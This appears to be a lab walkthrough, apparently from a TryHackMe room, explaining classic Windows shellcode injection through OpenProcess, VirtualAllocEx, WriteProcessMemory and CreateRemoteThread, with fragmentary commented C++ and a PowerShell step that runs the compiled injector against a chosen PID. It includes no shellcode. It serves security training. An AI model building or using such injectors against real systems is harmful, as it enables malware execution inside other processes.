Shellcode injection

Shellcode injection is the most basic form of process injection.


How Windows API calls interact with process memory.
  1. Open a target process with all access rights (OpenProcess).

  2. Allocate target process memory for the shellcode (VirtualAllocEx).

  3. Write shellcode to allocated memory in the target process (WriteProcessMemory).

  4. Execute the shellcode using a remote thread (CreateRemoteThread).

C++ Code

Open the target process supplied via the command-line:

processHandle = OpenProcess(
	PROCESS_ALL_ACCESS, // Defines access rights
	FALSE, // Target handle will not be inhereted
	DWORD(atoi(argv[1])) // Local process supplied by command-line arguments 

Allocate memory to the byte size of the shellcode:

remoteBuffer = VirtualAllocEx(
	processHandle, // Opened target process
	sizeof shellcode, // Region size of memory allocation
	(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
	PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages

Use the allocated memory region to write our shellcode to memory regions:

	processHandle, // Opened target process
	remoteBuffer, // Allocated memory region
	shellcode, // Data to write
	sizeof shellcode, // byte size of data

Execute the shellcode residing in memory:

remoteThread = CreateRemoteThread(
	processHandle, // Opened target process
	0, // Default size of the stack
	(LPTHREAD_START_ROUTINE)remoteBuffer, // Pointer to the starting address of the thread
	0, // Ran immediately after creation

Compile to create a basic process injector (shellcode-injector.exe).


On the target machine, start up Powershell, and identify a PID of a process running as THM-Attacker to target (using Details tab of TaskManager). I chose the PID of the Powershell.

PS C:\Users\THM-Attacker> cd .\Desktop\
PS C:\Users\THM-Attacker\Desktop> cd .\Injectors\
PS C:\Users\THM-Attacker\Desktop\Injectors> .\shellcode-injector.exe PID